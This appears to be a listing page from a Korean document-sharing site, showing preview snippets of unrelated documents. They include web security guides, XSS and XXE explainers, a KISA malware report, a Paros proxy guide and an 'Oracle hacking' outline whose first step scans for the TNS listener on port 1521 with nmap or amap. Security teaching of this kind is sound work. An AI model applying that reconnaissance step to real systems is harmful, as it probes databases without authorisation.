<32355FC8A8C6E4C0CCC1F620B1B8C3E020BAB8BEC820B0A1C0CCB5E52E687770> 안전한홈페이지운영을위한 웹서버설정및개발보안가이드 (Ver. 1.0) 2007. 10 출처 : CrossWeave 홈페이지개발보안정책가이드 (Ver. 1.3) Pusan National University Information Technology Center 1 / 13 목 차 Ⅰ. 개요 3 Ⅱ. 정보보호를고려한홈페이지구축의필요성 4 Ⅲ. 홈페이지구축및운영기본가이드

More information

Web Scraper in 30 Minutes 강철

Web Scraper in 30 Minutes 강철 Web Scraper in 30 Minutes 강철 발표자 소개 KAIST 전산학과 2015년부터 G사에서 일합니다. 에서 대한민국 정치의 모든 것을 개발하고 있습니다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 목표 웹 스크래퍼를 프레임웍 없이 처음부터 작성해 본다. 스크래퍼/크롤러의 작동 원리를 이해한다. 목표

More information

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B

< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B 월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

슬라이드 1

슬라이드 1 Tadpole for DB 1. 도구개요 2. 설치및실행 4. 활용예제 1. 도구개요 도구명 소개 Tadpole for DB Tools (sites.google.com/site/tadpolefordb/) 웹기반의데이터베이스를관리하는도구 Database 스키마및데이터관리 라이선스 LGPL (Lesser General Public License) 특징 주요기능

More information

(Microsoft Word - \301\266\301\326\272\300_XSS.docx)

(Microsoft Word - \301\266\301\326\272\300_XSS.docx) XSS(Cross Site Scripting) 1. XSS 란무엇인가 XSS 란 Cross Site Scripting 의약자 (CSS 라고도불리기도하나 Cascading Style Sheets 와혼용되어일반적으로 XSS 를많이사용한다.) 로 Web 보안취약점중하나이다. 이러한 XSS 는인터넷이생겨나고활성화되기전, 홈페이지소개및단지정보를제공하는정적인페이지에서인터넷이활성화된현재,

More information

untitled

untitled 보안서버구축가이드 8 Ⅲ. SSL 방식보안서버구축하기 1. 소개및보안서버구축절차 가. 개요 SSL은 Secure Sockets Layer의머리글이며, 1994년 Netscape에의해전세계적인표준보안기술이개발되었습니다. SSL 방식은웹브라우저와서버간의통신에서정보를암호화함으로써도중에해킹을통해정보가유출되더라도정보의내용을보호할수있는기능을갖춘보안솔루션으로전세계적으로수백만개의웹사이트에서사용하고있습니다.

More information

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법

More information

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation

1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation 1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 HTML5 웹프로그래밍입문 1 장. 인터넷과웹환경의발전 목차 1.1 인터넷의역사 1.2 HTML의발전 1.3 인터넷의기본개념 1.4 웹브라우저의종류 소스코드실행사이트 주소 : http://webclass.me/html5_2e 폴더 ch02/ ~ ch14/ 에각장의예제가있어서실행결과확인및소스보기가가능합니다. 1.1 인터넷의역사 1.1.1 인터넷의발전과정 1.1.2

More information

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1

More information

. PC PC 3 [ ] [ ], [ ] [ ] [ ] 3 [ ] [ ], 4 [ ] [ ], 4 [Internet Protocol Version 4 (TCP/IPv4)] 5 [ ] 6 [ IP (O)], [ DNS (B)] 7 [ ] 한국어 -

. PC PC 3 [ ] [ ], [ ] [ ] [ ] 3 [ ] [ ], 4 [ ] [ ], 4 [Internet Protocol Version 4 (TCP/IPv4)] 5 [ ] 6 [ IP (O)], [ DNS (B)] 7 [ ] 한국어 - Quick Network Setup Guide xdsl/cable Modem PC DVR ~3.., PC, DVR. Cable IP Cable/ADSL/ VDSL or 3 4 VIDEO OUT (SPOT) AUDIO IN VGA ALARM OUT COM ALARM IN RS-485 3 4 G G + 3 CONSOLE NETWORK DC V VIDEO IN VIDEO

More information

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault

목차 1. 시스템요구사항 암호및힌트설정 ( 윈도우 ) JetFlash Vault 시작하기 ( 윈도우 ) JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 사용자매뉴얼 JetFlash Vault 100 ( 버전 1.0) 1 목차 1. 시스템요구사항... 3 2. 암호및힌트설정 ( 윈도우 )... 3 3. JetFlash Vault 시작하기 ( 윈도우 )... 7 4. JetFlash Vault 옵션 ( 윈도우 )... 9 JetFlash Vault 설정... 9 JetFlash Vault 찾아보기... 10 JetFlash

More information

한국에너지기술연구원 통합정보시스템설치방법설명서 한국에너지기술연구원 지식정보실 - 1 -

한국에너지기술연구원 통합정보시스템설치방법설명서 한국에너지기술연구원 지식정보실 - 1 - 한국에너지기술연구원 통합정보시스템설치방법설명서 한국에너지기술연구원 지식정보실 - 1 - [1 단계 ] 운영체제별시스템설정방법 Windows XP 시스템설정방법 : XP 운영체제는설정할사항이없음 Windows 7 시스템설정방법 1) [ 시작 ]-[ 제어판 ]-[ 관리센터 ] 를클릭한다. - 2 - 2) 사용자계정컨트롤설정변경 을클릭한다. 3) 알리지않음 ( 사용자계정컨트롤끄기

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 WEB SERVER PORTING 1 Jo, Heeseung 웹서버포팅 HBE-SM5-S4210 를임베디드웹서버로사용할수있도록웹서버를올리는작업 임베디드서버에널리쓰이는웹서버들중 GoAhead 라는웹서버를포팅 CGI 프로그램을이용하여웹에서 HBE-SM5-S4210 의 LED, 7- Segment, TextLCD 를제어실습 2 Goahead webserver 소스를다운받거나제공된

More information

슬라이드 1

슬라이드 1 TCPdump 사용법 Neworks, Inc. (Tel) 070-7101-9382 (Fax) 02-2109-6675 ech@pumpkinne.com hp://www.pumpkinne.co.kr TCPDUMP Tcpdump 옵션 ARP 정보 ICMP 정보 ARP + ICMP 정보 IP 대역별정보 Source 및 Desinaion 대역별정보 Syn 과 syn-ack

More information

<4D F736F F F696E74202D2031C0E52E4A535020B9D C6574C0BB20C8B0BFEBC7D120B5BFC0FB20C0A520C7C1B7CEB1D7B7A1B9D620BCD2B0B32

<4D F736F F F696E74202D2031C0E52E4A535020B9D C6574C0BB20C8B0BFEBC7D120B5BFC0FB20C0A520C7C1B7CEB1D7B7A1B9D620BCD2B0B32 1 장. JSP 및 Servlet 을활용한동적웹프로그래밍소개 제 1 장 WWW (World Wide Web) 1. 웹동작방식 인터넷상에분산되어존재하는온갖종류의정보를통일된방법으로찾아볼수있게하는광역정보서비스및소프트웨어 1989년 CERN (European Council for Nuclear Research) 의 Tim Berners-Lee가제안 Web Server

More information

아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다

아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다 공유기사용환경에서 MNC-V100 환경설정하기 다음설명은 AnyGate GW-400A (Http://www.anygate.co.kr) 를사용하는네트워크환경에서 MNC-V100 을연결하여사용하는법을설명합니다. 공유기내부네트워크환경설정공유기를사용하는환경에서공유기의설정을아래그림과같이설정하시면 MNC-V100의설정을변경하지않아도모비캠과연결할수있습니다. ( 공유기의환경을변경하기어려운경우에는

More information

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상

아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상 Android 용 Brother Image Viewer 설명서 버전 0 KOR 아이콘의 정의 본 사용자 설명서에서는 다음 아이콘을 사용합니다. 참고 참고는 발생할 수 있는 상황에 대처하는 방법을 알려 주거나 다른 기능과 함께 작동하는 방법에 대한 요령을 제공합니다. 상표 Brother 로고는 Brother Industries, Ltd.의 등록 상표입니다. Android는

More information

0. 들어가기 전

0. 들어가기 전 1 13 장. 웹 (WWW) 컴퓨터네트워크 2 13-1 웹서비스 이번시간의학습목표 웹서비스를위한클라이언트 - 서버구조이해 웹서비스를지원하는 APM(Apache, PHP, MySQL) 의연동방식이해 3 웹서비스개요 전세계적으로 TCP, UDP, SCTP 포트 80 으로지정 보안을위해 8000, 8080 등을이용하기도함 보안이강화된 HTTPS(HTTP over

More information

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 (https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)

More information

"Paros"는 웹 어플리케이션의 보안을 점검하기 위해 사용하는 웹 프록시 툴이다

Paros는 웹 어플리케이션의 보안을 점검하기 위해 사용하는 웹 프록시 툴이다 Web Proxy 와 Paros, Odysseus 사용법 By poc@securityproof.net 차례 1. web proxy 란무엇인가? 2. Paros 소개 2-1. 설치및기본설정 2-2. Paros 의기능 2-3. Paros 를이용한웹해킹의예 3. Odysseus 3-1. 설치및기본사용방법 3-2. Odysseus 를이용한웹해킹의예 1. web proxy란무엇인가?

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 B Type 가이드 가지고있는도메인사용 + 인증서구매대행절차 1. 신청하기. 네임서버변경 / 확인 - 네임서버변경 - 네임서버변경확인 3. 인증심사메일에회신하기 - 메일주소확인 - 메일주소변경 - 인증심사메일서명 4. Ver. 015.10.14 가지고있는도메인사용 + 인증서구매대행절차 도메인은가지고있으나인증서가없는경우소유한도메인주소로 를오픈하고인증서는 Qoo10

More information

JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른

JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른 JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른 URL로바꿀수있다. 예 ) response.sendredirect("http://www.paran.com");

More information

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.

기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. 기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는

More information

슬라이드 제목 없음

슬라이드 제목 없음 MS SQL Server 마이크로소프트사가윈도우운영체제를기반으로개발한관계 DBMS 모바일장치에서엔터프라이즈데이터시스템에이르는다양한플랫폼에서운영되는통합데이터관리및분석솔루션 2 MS SQL Server 개요 3.1 MS SQL Server 개요 클라이언트-서버모델을기반으로하는관계 DBMS 로서윈도우계열의운영체제에서만동작함 오라클관계 DBMS 보다가격이매우저렴한편이고,

More information

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름 EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection

More information